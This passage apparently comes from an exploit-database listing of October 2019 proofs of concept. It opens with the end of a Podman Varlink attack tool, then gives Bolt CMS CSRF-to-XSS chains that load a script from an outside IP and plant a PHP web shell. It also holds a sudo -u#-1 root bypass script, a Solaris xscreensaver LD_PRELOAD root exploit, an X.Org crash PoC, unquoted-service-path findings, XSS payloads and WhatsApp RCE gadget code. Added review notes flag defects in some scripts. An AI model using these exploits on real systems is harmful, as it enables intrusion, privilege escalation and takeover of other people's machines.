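    elif action == 'exec':
        _do_exec(pman, host, port, image, label)
    elif action == 'dos':
        _do_dos(host, port)
    elif action == 'blind':
        _do_blind(host, port)
    elif action == 'volrm':
        _do_volrm(host, port)
    else:
        print("Error: unknown action %r" % action)
        return
    print("Done!")


def doSocketSend(ip, port, message):
    """Connect, send one NUL-terminated Varlink message, disconnect.

    ``ip``/``port`` is a TCP endpoint; with ``port`` None, ``ip`` is taken as
    a UNIX socket path (``unix:`` addresses, see _parse_address). The
    podman/varlink libraries expose none of the calls used above, hence the
    raw socket. Errors are printed and swallowed on purpose: for the DoS
    payloads a dropped connection *is* the expected outcome.
    """
    if port is None:
        sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        target = ip
    else:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        target = (ip, port)
    sock.settimeout(SOCKET_TIMEOUT)   # the original could block forever on connect()
    try:
        # 'with' closes the socket on every path; the original's finally
        # referenced `sock` even when socket() itself had raised.
        with sock:
            sock.connect(target)
            sock.sendall(message.encode())   # send() may write only part of the buffer
    except (OSError, UnicodeError) as error:
        print(str(error))


def isItTime():
    """Easter egg: at 11:11 local time print a pickled greeting.

    pickle.loads() here only ever sees bytes this function produced one line
    earlier, so it is harmless; never point it at data from the network.
    """
    tm = time.localtime()
    p = pickle.dumps('it\'s pickle time!')
    if (str(tm.tm_hour) == '11') and (str(tm.tm_min) == '11'):
        print(pickle.loads(p))
    # otherwise: no dill


if __name__ == '__main__':
    main()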
  6. # Exploit Title: Bolt CMS 3.6.10 - Cross-Site Request Forgery # Date: 2019-10-15 # Exploit Author: r3m0t3nu11[Zero-Way] # Vendor Homepage: https://bolt.cm/ # Software Link: https://bolt.cm/ # Version: up to date and 6.5 # Tested on: Linux # CVE : CVE-2019-17591 # last version
<!--
  NOTE(review): how the chain below fits together, as far as the code shows.
  PoC 1 (the CSRF page) makes a logged-in Bolt backend user's browser POST,
  with cookies (withCredentials = true) and without any CSRF token, to three
  /async/* endpoints: folder/create, file/create, then file/rename with a new
  file name that embeds a <script src=...> tag -- presumably rendered
  unescaped in the file manager, giving stored XSS in the backend origin.
  PoC 2 is the script that tag would load: it fetches /bolt/files to harvest
  the file_upload[_token] CSRF token, uploads a .txt containing PHP, then
  renames it into a .php path. The script host 45.63.42.245 is the author's;
  reproducing requires your own host. The victim must be logged in to the
  backend. Several defects in the JavaScript are noted inline.
-->
# Csrf p0c
<html>
<body>
<head> Bolt v 3.x exploit 0day </head>
<h1>Bolt v 3.x csrf -> xss -> rce exploit</h1>
<img src =" https://66.media.tumblr.com/8c1e5f1a62191b9091fd8736f8c4810b/tumblr_pf6q303FlE1vgbzx6o1_r1_400.jpg">
<script>
function submitRequest() {
  // Step 1: create folder "sss" in the files namespace (no CSRF token sent).
  Csrf = async () => {
    const xhr = new XMLHttpRequest();
    xhr.open("POST", "http:\/\/127.0.0.1\/index.php\/async\/folder\/create", true);
    xhr.setRequestHeader("Accept", "*\/*");
    xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
    xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded; charset=UTF-8");
    xhr.withCredentials = true; // rides on the victim's Bolt session cookie
    var body = "parent=&foldername=sss&namespace=files";
    var aBody = new Uint8Array(body.length);
    for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i);
    xhr.send(new Blob([aBody]));
    // NOTE(review): the handler is attached after send(), the status check is
    // an empty block, and JSfuck1() runs on every readyState change regardless
    // of the result -- the next step is not actually gated on success.
    xhr.onreadystatechange = async (e) => {
      if (xhr.readyState === 4 && xhr.status === 200){ };
      JSfuck1();
    }
  }
  // Step 2: create file "aaa" inside "sss".
  JSfuck1 = async () => {
    const xhr = new XMLHttpRequest();
    xhr.open("POST", "http:\/\/127.0.0.1\/index.php\/async\/file\/create", true);
    xhr.setRequestHeader("Accept", "*\/*");
    xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
    xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded; charset=UTF-8");
    xhr.withCredentials = true;
    var body1 = "filename=aaa&parentPath=sss&namespace=files";
    xhr.send(body1);
    xhr.onreadystatechange = async (e) => {
      if (xhr.readyState === 4 && xhr.status === 200){ }
    };
    // NOTE(review): where() is called synchronously here, before the create
    // request has completed -- a race with step 3's rename of that file.
    where();
  }
  // Step 3: rename the file to a name carrying a <script src=...> tag
  // (URL-encoded, with '/' as HTML entities); the ".jpg" suffix is presumably
  // what gets it past an extension check -- unverified.
  where = async () => {
    const xhr = new XMLHttpRequest();
    xhr.open("POST", "http:\/\/127.0.0.1\/index.php\/async\/file\/rename", true);
    xhr.setRequestHeader("Accept", "*\/*");
    xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
    xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded; charset=UTF-8");
    xhr.withCredentials = true;
    var body2 = "namespace=files&parent=sss&oldname=aaa&newname=aaa%3Cscript+src%3D'http%3A%26%23x2f%3B%26%23x2f%3B45.63.42.245%26%23x2f%3Bfinal.js'%3C%26%23x2f%3Bscript%3E.jpg";
    xhr.send(body2);
  }
  Csrf();
}
</script>
<form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form>
</body>
</html>
JS p0c
<!-- Runs in the Bolt backend origin once the stored XSS above fires. -->
<script>
// Fetch the file-manager page as a DOM and read the upload form's CSRF token.
Token = async () => {
  var xhr = new XMLHttpRequest();
  xhr.open("GET", "\/index.php\/bolt\/files", true);
  xhr.responseType = "document";
  xhr.withCredentials=true;
  xhr.onreadystatechange = async (e) => {
    if (xhr.readyState === 4 && xhr.status === 200){
      doc = xhr.response;
      token = doc.getElementsByName("file_upload[_token]")[0].value; // implicit global
      upload(token);
      console.log(token);
    }
  };
  xhr.send();
}
// Multipart upload of a .txt whose body is a PHP one-liner web shell.
upload = async (csrfToken) =>{
  // NOTE(review): the csrfToken parameter is never used; the global `token`
  // set in Token() is read instead.
  var body = "-----------------------------190530466613268610451083392867\r\n" +
    "Content-Disposition: form-data; name=\"file_upload[select][]\"; filename=\"r3m0t3nu11.txt\"\r\n" +
    "Content-Type: text/plain\r\n" +
    "\r\n" +
    "<?php system($_GET['test']);?>\r\n" +
    "-----------------------------190530466613268610451083392867\r\n" +
    "Content-Disposition: form-data; name=\"file_upload[upload]\"\r\n" +
    "\r\n" +
    "\r\n" +
    "-----------------------------190530466613268610451083392867\r\n" +
    "Content-Disposition: form-data; name=\"file_upload[_token]\"\r\n" +
    "\r\n" +
    // NOTE(review): there is no '+' between `token` and the closing boundary
    // on the next line; as written this is a SyntaxError, so this whole
    // script fails to parse and upload() never runs.
    token "-----------------------------190530466613268610451083392867--\r\n";
  const xhr = new XMLHttpRequest();
  xhr.open("POST", "http:\/\/127.0.0.1\/index.php\/bolt\/files", true);
  xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
  xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------190530466613268610451083392867");
  xhr.withCredentials = true;
  xhr.onreadystatechange = async (e) => {
    if (xhr.readyState === 4 && xhr.status === 200){
      Shell();
    }
  };
  var aBody = new Uint8Array(body.length);
  for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i);
  xhr.send(new Blob([aBody]));
}
// Rename the uploaded .txt into a nested path whose final component is
// "aaa.jpg"; the two folder renames below then turn the intermediate
// "php-exif-system.php" directory name into the served .php file. The
// exact filter this evades is not shown here.
Shell = async () => {
  const xhr = new XMLHttpRequest();
  xhr.open("POST", "http:\/\/127.0.0.1/index.php/async/file/rename", true);
  xhr.setRequestHeader("Accept", "*\/*");
  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
  xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded; charset=UTF-8");
  xhr.withCredentials = true;
  xhr.timeout = 4000;
  var body1 = "namespace=files&parent=&oldname=r3m0t3nu11.txt&newname=dd%2Fphp-exif-systemasjpg%2Faa%2Fphp-exif-system.php%2Faaa.jpg";
  xhr.send(body1);
  // NOTE(review): bypass() is called synchronously, not from the rename callback.
  bypass();
}
bypass = async () => {
  const xhr = new XMLHttpRequest();
  xhr.open("POST", "http:\/\/127.0.0.1/index.php/async/folder/rename", true);
  xhr.setRequestHeader("Accept", "*\/*");
  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
  xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded; charset=UTF-8");
  xhr.withCredentials = true;
  xhr.timeout = 4000;
  var body1 = "namespace=files&parent=dd%2Fphp-exif-systemasjpg%2Faa/php-exif-system.php%2f&oldname=aaa.jpg&newname=bypass.php";
  xhr.send(body1);
  // NOTE(review): same ordering issue -- bypass2() does not wait for this rename.
  bypass2();
}
bypass2 = async () => {
  const xhr = new XMLHttpRequest();
  xhr.open("POST", "http:\/\/127.0.0.1/index.php/async/folder/rename", true);
  xhr.setRequestHeader("Accept", "*\/*");
  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
  xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded; charset=UTF-8");
  xhr.withCredentials = true;
  xhr.timeout = 4000;
  var body1 = "namespace=files&parent=dd%2Fphp-exif-systemasjpg%2Faa/&oldname=php-exif-system.php&newname=bypass1";
  xhr.send(body1);
}
Token();
</script>
version 6.5 CSrf p0c
<!-- Variant against a hosted test instance (bolt-4mti18.bolt.dockerfly.com): a
     single file/create followed by a rename to an <img onerror> payload, i.e.
     the same CSRF -> stored-XSS step without the folder creation. -->
<html>
<body>
<head> Bolt v 3.x CVE-2019-17591 exploit </head>
<h1>Bolt v 3.x csrf -> xss -> rce exploit</h1>
<img src =" https://66.media.tumblr.com/8c1e5f1a62191b9091fd8736f8c4810b/tumblr_pf6q303FlE1vgbzx6o1_r1_400.jpg">
<script>
function submitRequest() {
  Csrf = async () => {
    const xhr = new XMLHttpRequest();
    xhr.open("POST", "http:\/\/bolt-4mti18.bolt.dockerfly.com\/async\/file\/create", true);
    xhr.setRequestHeader("Accept", "*\/*");
    xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
    xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded; charset=UTF-8");
    xhr.withCredentials = true;
    var body = "filename=test&parentPath=&namespace=files";
    var aBody = new Uint8Array(body.length);
    for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i);
    xhr.send(new Blob([aBody]));
    // Here the next step is correctly gated on a 200 response.
    xhr.onreadystatechange = async (e) => {
      if (xhr.readyState === 4 && xhr.status === 200){
        JSfuck();
      }
    };
  }
  JSfuck = async () => {
    const xhr = new XMLHttpRequest();
    xhr.open("POST", "http:\/\/bolt-4mti18.bolt.dockerfly.com\/async\/file\/rename", true);
    xhr.setRequestHeader("Accept", "*\/*");
    xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
    xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded; charset=UTF-8");
    xhr.withCredentials = true;
    // New file name is raw HTML; the rename endpoint evidently accepts '<' and quotes.
    var body1 = "namespace=files&parent=&oldname=test&newname=<img src='x' onerror=alert(1)>";
    xhr.send(body1);
  }
  Csrf();
}
</script>
<form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form>
</body>
</html>
Js p0c
<!-- Same upload-then-rename routine as above, against paths without index.php;
     in this variant a plain rename to "b.php" is used, with no nested-path trick. -->
<script>
Token = async () => {
  var xhr = new XMLHttpRequest();
  xhr.open("GET", "\/bolt\/files", true);
  xhr.responseType = "document";
  xhr.withCredentials=true;
  xhr.onreadystatechange = async (e) => {
    if (xhr.readyState === 4 && xhr.status === 200){
      doc = xhr.response;
      token = doc.getElementsByName("file_upload[_token]")[0].value;
      upload(token);
      console.log(token);
    }
  }
  xhr.send(null);
}
upload = async (csrfToken) =>{
  // NOTE(review): same two defects as the first JS PoC -- csrfToken is unused,
  // and the missing '+' before the closing boundary below is a SyntaxError.
  var body = "-----------------------------190530466613268610451083392867\r\n" +
    "Content-Disposition: form-data; name=\"file_upload[select][]\"; filename=\"r3m0t3nu11.txt\"\r\n" +
    "Content-Type: text/plain\r\n" +
    "\r\n" +
    "<?php system($_GET['test']);?>\r\n" +
    "-----------------------------190530466613268610451083392867\r\n" +
    "Content-Disposition: form-data; name=\"file_upload[upload]\"\r\n" +
    "\r\n" +
    "\r\n" +
    "-----------------------------190530466613268610451083392867\r\n" +
    "Content-Disposition: form-data; name=\"file_upload[_token]\"\r\n" +
    "\r\n" +
    token "-----------------------------190530466613268610451083392867--\r\n";
  const xhr = new XMLHttpRequest();
  xhr.open("POST", "http:\/\/127.0.0.1\/bolt\/files", true);
  xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
  xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------190530466613268610451083392867");
  xhr.withCredentials = true;
  xhr.onreadystatechange = async (e) => {
    if (xhr.readyState === 4 && xhr.status === 200){
      Shell();
    }
  };
  var aBody = new Uint8Array(body.length);
  for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i);
  xhr.send(new Blob([aBody]));
}
Shell = async () => {
  const xhr = new XMLHttpRequest();
  // NOTE(review): URL has a doubled slash ("127.0.0.1//async/..."); whether the
  // router tolerates it is not shown.
  xhr.open("POST", "http:\/\/127.0.0.1/\/async\/file\/rename", true);
  xhr.setRequestHeader("Accept", "*\/*");
  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
  xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded; charset=UTF-8");
  xhr.withCredentials = true;
  var body1 = "namespace=files&parent=%2f&oldname=r3m0t3nu11.txt&newname=b.php";
  xhr.send(body1);
}
Token();
</script>
proof of concept : https://drive.google.com/file/d/1TRjzOM-q8cWK1JA9cN1Auhp7Ao3AXtbp/view?usp=sharing https://drive.google.com/file/d/1QSE7Dnx0XZth9WciaohjhA6nk_-9jCr1/view?usp=sharing Greetz to : Samir-dz,YokO,0n3,Mr_Hex,syfi2k,Q8Librarian,Dr_hEx,dracula1337,z0mbi3_h4ck3r,Red Virus,m7md1337,D3vil1337,and all my friends
  7. # Exploit Title : sudo 1.8.27 - Security Bypass
# Date : 2019-10-15
# Original Author: Joe Vennix
# Exploit Author : Mohin Paramasivam (Shad0wQu35t)
# Version : Sudo <1.8.28
# Tested on Linux
# Credit : Joe Vennix from Apple Information Security found and analyzed the bug
# Fix : The bug is fixed in sudo 1.8.28
# CVE : 2019-14287
'''Check for the user sudo permissions

sudo -l

User hacker may run the following commands on kali:
    (ALL, !root) /bin/bash

So user hacker can't run /bin/bash as root (!root)

User hacker sudo privilege in /etc/sudoers

# User privilege specification
root    ALL=(ALL:ALL) ALL
hacker  ALL=(ALL,!root) /bin/bash

With ALL specified, user hacker can run the binary /bin/bash as any user

EXPLOIT:

sudo -u#-1 /bin/bash

Example :

hacker@kali:~$ sudo -u#-1 /bin/bash
root@kali:/home/hacker# id
uid=0(root) gid=1000(hacker) groups=1000(hacker)
root@kali:/home/hacker#

Description :

Sudo doesn't check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv
-u#-1 returns as 0 which is root's id

and /bin/bash is executed with root permission

Proof of Concept Code :

How to use :

python3 sudo_exploit.py
'''
#!/usr/bin/python3
# Review note (defensive context): per the description above, the root cause is that
# sudo before 1.8.28 does not validate the numeric user id given with -u#<uid>, so -1
# is resolved to uid 0. Only sudoers rules written as an exclusion list of target users
# (the "(ALL, !root)" form shown above) are affected. Mitigation: upgrade to sudo 1.8.28
# (the Fix line in the header).
import os

#Get current username
# NOTE(review): `username` is read but never used anywhere below.
username = input("Enter current username :")

#check which binary the user can run with sudo
# Writes the `sudo -l` output to a scratch file named "priv" in the current directory.
os.system("sudo -l > priv")
# Keeps the text after the first ')' on lines containing 'ALL' -- for the sample rule
# above, "(ALL, !root) /bin/bash", that is " /bin/bash" -- in a second scratch file.
os.system("cat priv | grep 'ALL' | cut -d ')' -f 2 > binary")
# NOTE(review): the handle is never closed and neither scratch file is removed.
binary_file = open("binary")
binary= binary_file.read()

#execute sudo exploit
print("Lets hope it works")
os.system("sudo -u#-1 "+ binary)
  8. # Exploit Title : ActiveFax Server 6.92 Build 0316 - 'ActiveFaxServiceNT' Unquoted Service Path # Date : 2019-10-15 # Exploit Author : Cakes # Vendor Homepage: https://www.actfax.com/ # Software Link : https://www.actfax.com/download/actfax_setup_x64_ge.exe # Version : ActiveFax Server 6.92 Build 0316 # Tested on Windows 10 # CVE : N/A sc qc ActiveFaxServiceNT [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ActiveFaxServiceNT TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\ActiveFax\Server\ActSrvNT.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : ActiveFax-Server-Dienst DEPENDENCIES : SERVICE_START_NAME : .\Administrator
  9. # Lavasoft 2.3.4.7 - 'LavasoftTcpService' Unquoted Service Path # Author: Luis MedinaL # Date: 2019-10-15 # Vendor Homepage: https://www.adaware.com/ # Software Link : https://www.adaware.com/antivirus # Version : 2.3.4.7 # Tested on: Microsoft Windows 10 Pro x64 ESP # Description: # Lavasoft 2.3.4.7 installs LavasoftTcpService as a service with an unquoted service path C:\Users\Luis ML>sc qc LavasoftTcpService [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: LavasoftTcpService TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Lavasoft\Web Companion\TcpService\2.3.4.7\LavasoftTcpService.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : LavasoftTcpService DEPENDENCIAS : RPCSS NOMBRE_INICIO_SERVICIO: LocalSystem
  10. # Exploit Title: Express Accounts Accounting 7.02 - Persistent Cross-Site Scripting # Exploit Author: Debashis Pal # Date: 2019-10-16 # Vendor Homepage: https://www.nchsoftware.com # Source: https://www.nchsoftware.com/accounting/index.html # Version: Express Accounts Accounting v7.02 # CVE : N/A # Tested on: Windows 7 SP1(32bit) # About Express Accounts Accounting v7.02 ========================================= Express Accounts is professional business accounting software, perfect for small businesses. # Vulnerability ================ Persistent cross-site scripting (XSS). # PoC ====== 1. Log in as an authenticated unprivileged user to the Express Accounts Accounting v7.02 web-enabled service, i.e. http://A.B.C.D:98 [Default installation]. 2. Under "Invoices", Invoices List -> View Invoices -> Add New Invoice -> Customer: Field put </script><script>alert('XSS');</script> Save the change. or Under "Sales Orders" Sales Orders -> view Orders -> Add New Order -> New Sales Order ->Customer: Field put </script><script>alert('XSS');</script> Save the change. or Under "Items" Items -> Add new item-> Item field: put </script><script>alert('XSS');</script> Save the change. or Under "Customers" Customers -> Add New Customer -> Customer Name: put </script><script>alert('XSS');</script> Save the change. or Under "Quotes" Quotes -> View Quotes -> Add New Quote -> Customer: put </script><script>alert('XSS');</script> Save the change. 3. Log in as an authenticated privileged or unprivileged user to the Express Accounts v7.02 web-enabled service and visit any of the Invoices/Sales Orders/Items/Customers/Quotes sections; the persistent XSS payload will execute. # Disclosure Timeline ====================== Vulnerability Discovery Date: 15-Sep-2019. Vulnerability notification to vendor via vendor-provided web form: 15-Sep-2019, 19-Sep-2019, 26-Sep-2019, no response. Submit exploit-db : 16-Oct-2019. 
# Disclaimer ============= The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
  11. # Exploit Title : Zilab Remote Console Server 3.2.9 - 'zrcs' Unquoted Service Path # Date : 2019-10-15 # Exploit Author : Cakes # Vendor: Zilab Software Inc # Version : Zilab Remote Console Server 3.2.9 # Software: http://html.tucows.com/preview/340137/Zilab-Remote-Console-Server?q=remote+support # Tested on Windows 10 # CVE : N/A C:\Users\Administrator>sc qc zrcs [SC] QueryServiceConfig SUCCESS SERVICE_NAME: zrcs TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:\Program Files (x86)\Zilab\ZRCS\ZRCS.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Zilab Remote Console Server DEPENDENCIES : SERVICE_START_NAME : LocalSystem
  12. # Exploit Title: X.Org X Server 1.20.4 - Local Stack Overflow
# Date: 2019-10-16
# Exploit Author: Marcelo Vázquez (aka s4vitar)
# Vendor Homepage: https://www.x.org/
# Version: <= 1.20.4
# Tested on: Linux
# CVE: CVE-2019-17624
#!/usr/bin/python
#coding: utf-8
# ************************************************************************
# * Author: Marcelo Vázquez (aka s4vitar)                                *
# * X.Org X Server 1.20.4 / X Protocol Version 11 (Stack Overflow)       *
# ************************************************************************
# Review note (defensive context): this is a Python 2 script (print statements). It is
# a local crash PoC for CVE-2019-17624, which the header lists as affecting X.Org X Server
# <= 1.20.4; the only X request it issues is XQueryKeymap through ctypes. The header gives
# no fixed version, so check the distribution advisory for CVE-2019-17624 when patching.
import sys, time
import ctypes as ct
from ctypes import cast  # NOTE(review): imported but never used.
from ctypes.util import find_library

def access_violation(x11, current_display):
    """Issue the XQueryKeymap call that this PoC uses to trigger the reported crash.

    x11: the libX11 handle returned by ct.cdll.LoadLibrary; current_display: the value
    returned by x11.XOpenDisplay. A 1000-byte ctypes char array is passed as the second
    argument of XQueryKeymap. Returns nothing.
    """
    keyboard = (ct.c_char * 1000)()
    x11.XQueryKeymap(current_display, keyboard)

if __name__ == '__main__':
    print "\n[*] Loading x11...\n"
    time.sleep(2)
    # find_library resolves the shared library by name ("X11"); the returned handle and
    # display are passed straight to access_violation() without any None checks.
    x11 = ct.cdll.LoadLibrary(find_library("X11"))
    current_display = x11.XOpenDisplay(None)
    print "[*] Exploiting...\n"
    time.sleep(1)
    try:
        access_violation(x11, current_display)
    except:
        # NOTE(review): the bare except hides the real exception, so a failed library
        # load or display connection is reported exactly like any other error.
        print "\nError...\n"
        sys.exit(1)
  13. # Exploit Title : LiteManager 4.5.0 - 'romservice' Unquoted Service Path # Date : 2019-10-15 # Exploit Author : Cakes # Vendor: LiteManager Team # Version : LiteManager 4.5.0 # Software: http://html.tucows.com/preview/1594042/LiteManager-Free?q=remote+support # Tested on Windows 10 # CVE : N/A c:\>sc qc romservice [SC] QueryServiceConfig SUCCESS SERVICE_NAME: romservice TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\LiteManagerFree - Server\ROMServer.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : LiteManagerTeam LiteManager DEPENDENCIES : SERVICE_START_NAME : LocalSystem
  14. # Exploit Title: Solaris xscreensaver 11.4 - Privilege Escalation # Date: 2019-10-16 # Exploit Author: Marco Ivaldi # Vendor Homepage: https://www.oracle.com/technetwork/server-storage/solaris11/ # Version: Solaris 11.x # Tested on: Solaris 11.4 and 11.3 X86 # CVE: N/A #!/bin/sh # # raptor_xscreensaver - Solaris 11.x LPE via xscreensaver # Copyright (c) 2019 Marco Ivaldi <[email protected]> # # Exploitation of a design error vulnerability in xscreensaver, as # distributed with Solaris 11.x, allows local attackers to create # (or append to) arbitrary files on the system, by abusing the -log # command line switch introduced in version 5.06. This flaw can be # leveraged to cause a denial of service condition or to escalate # privileges to root. This is a Solaris-specific vulnerability, # caused by the fact that Oracle maintains a slightly different # codebase from the upstream one (CVE-2019-3010). # # "I'd rather be lucky than good any day." -- J. R. "Bob" Dobbs # "Good hackers force luck." -- ~A. # # This exploit targets the /usr/lib/secure/ directory in order # to escalate privileges with the LD_PRELOAD technique. The # implementation of other exploitation vectors, including those # that do not require gcc to be present on the target system, is # left as an exercise to fellow UNIX hackers;) # # Usage: # raptor@stalker:~$ chmod +x raptor_xscreensaver # raptor@stalker:~$ ./raptor_xscreensaver # [...] # Oracle Corporation SunOS 5.11 11.4 Aug 2018 # root@stalker:~# id # uid=0(root) gid=0(root) # root@stalker:~# rm /usr/lib/secure/64/getuid.so /tmp/getuid.* # # Vulnerable platforms: # Oracle Solaris 11 X86 [tested on 11.4 and 11.3] # Oracle Solaris 11 SPARC [untested] # echo "raptor_xscreensaver - Solaris 11.x LPE via xscreensaver" echo "Copyright (c) 2019 Marco Ivaldi <[email protected]>" echo # prepare the payload echo "int getuid(){return 0;}" > /tmp/getuid.c gcc -fPIC -Wall -g -O2 -shared -o /tmp/getuid.so /tmp/getuid.c -lc if [ $? 
-ne 0 ]; then echo "error: problem compiling the shared library, check your gcc" exit 1 fi # check the architecture LOG=/usr/lib/secure/getuid.so file /bin/su | grep 64-bit >/dev/null 2>&1 if [ $? -eq 0 ]; then LOG=/usr/lib/secure/64/getuid.so fi # start our own xserver # alternatively we can connect back to a valid xserver (e.g. xquartz) /usr/bin/Xorg :1 & # trigger the bug umask 0 /usr/bin/xscreensaver -display :1 -log $LOG & sleep 5 # clean up pkill -n xscreensaver pkill -n Xorg # LD_PRELOAD-fu cp /tmp/getuid.so $LOG LD_PRELOAD=$LOG su -
  15. # Exploit Title : Mikogo 5.2.2.150317 - 'Mikogo-Service' Unquoted Service Path # Date : 2019-10-15 # Exploit Author : Cakes # Vendor: LiteManager Team # Version : LiteManager 4.5.0 # Software: http://html.tucows.com/preview/518015/Mikogo?q=remote+support # Tested on Windows 10 # CVE : N/A c:\>sc qc Mikogo-Service [SC] QueryServiceConfig SUCCESS SERVICE_NAME: Mikogo-Service TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Users\Administrator\AppData\Roaming\Mikogo\Mikogo-Service.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Mikogo-Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem
  16. # Exploit Title: Whatsapp 2.19.216 - Remote Code Execution # Date: 2019-10-16 # Exploit Author: Valerio Brussani (@val_brux) # Vendor Homepage: https://www.whatsapp.com/ # Version: < 2.19.244 # Tested on: Whatsapp 2.19.216 # CVE: CVE-2019-11932 # Reference1: https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/ # Full Android App: https://github.com/valbrux/CVE-2019-11932-SupportApp # Credits: all credits for the bug discovery goes to Awakened (https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/) /* * * Introduction * This native code file aims to be complementary to the published Whatsapp GIF RCE exploit by Awakened , by calculating the system() function address and ROP gadget address for different types of devices, which then can be used to successfully exploit the vulnerability. * The full Android application code is available at the following link https://github.com/valbrux/CVE-2019-11932-SupportApp * */ #include <jni.h> #include <string> #include <dlfcn.h> #include <link.h> typedef uint8_t byte; char *gadget_p; void* libc,* lib; //dls iteration for rop int dl_callback(struct dl_phdr_info *info, size_t size, void *data) { int j; const char *base = (const char *)info->dlpi_addr; for (j = 0; j < info->dlpi_phnum; j++) { const ElfW(Phdr) *phdr = &info->dlpi_phdr[j]; if (phdr->p_type == PT_LOAD && (strcmp("/system/lib64/libhwui.so",info->dlpi_name) == 0)) { gadget_p = (char *) base + phdr->p_vaddr; return 1; } } return 0; } //system address void* get_system_address(){ libc = dlopen("libc.so",RTLD_GLOBAL); void* address = dlsym( libc, "system"); return address; } //rop gadget address void get_gadget_lib_base_address() { lib = dlopen("libhwui.so",RTLD_GLOBAL); dl_iterate_phdr(dl_callback, NULL); } //search gadget long search_for_gadget_offset() { char *buffer; long filelen; char curChar; long pos = 0; int curSearch = 0; //reading file FILE* fd = fopen("/system/lib64/libhwui.so","rb"); fseek(fd, 0, SEEK_END); filelen = ftell(fd); 
rewind(fd); buffer = (char *)malloc((filelen+1)*sizeof(char)); fread(buffer, filelen, 1, fd); fclose(fd); //searching for bytes byte g1[12] = {0x68, 0x0E, 0x40, 0xF9, 0x60, 0x82, 0x00, 0x91, 0x00, 0x01, 0x3F, 0xD6}; while(pos <= filelen){ curChar = buffer[pos];pos++; if(curChar == g1[curSearch]){ curSearch++; if(curSearch > 11){ curSearch = 0; pos-=12; break; } } else{ curSearch = 0; } } return pos; } extern "C" JNIEXPORT jstring JNICALL Java_com_valbrux_myapplication_MainActivity_getSystem(JNIEnv* env,jobject) { char buff[30]; //system address snprintf(buff, sizeof(buff), "%p", get_system_address()); dlclose(libc); std::string system_string = buff; return env->NewStringUTF(system_string.c_str()); } extern "C" JNIEXPORT jstring JNICALL Java_com_valbrux_myapplication_MainActivity_getROPGadget(JNIEnv* env,jobject) { char buff[30]; get_gadget_lib_base_address(); //gadget address snprintf(buff, sizeof(buff), "%p",gadget_p+search_for_gadget_offset()); dlclose(lib); std::string system_string = buff; return env->NewStringUTF(system_string.c_str()); }
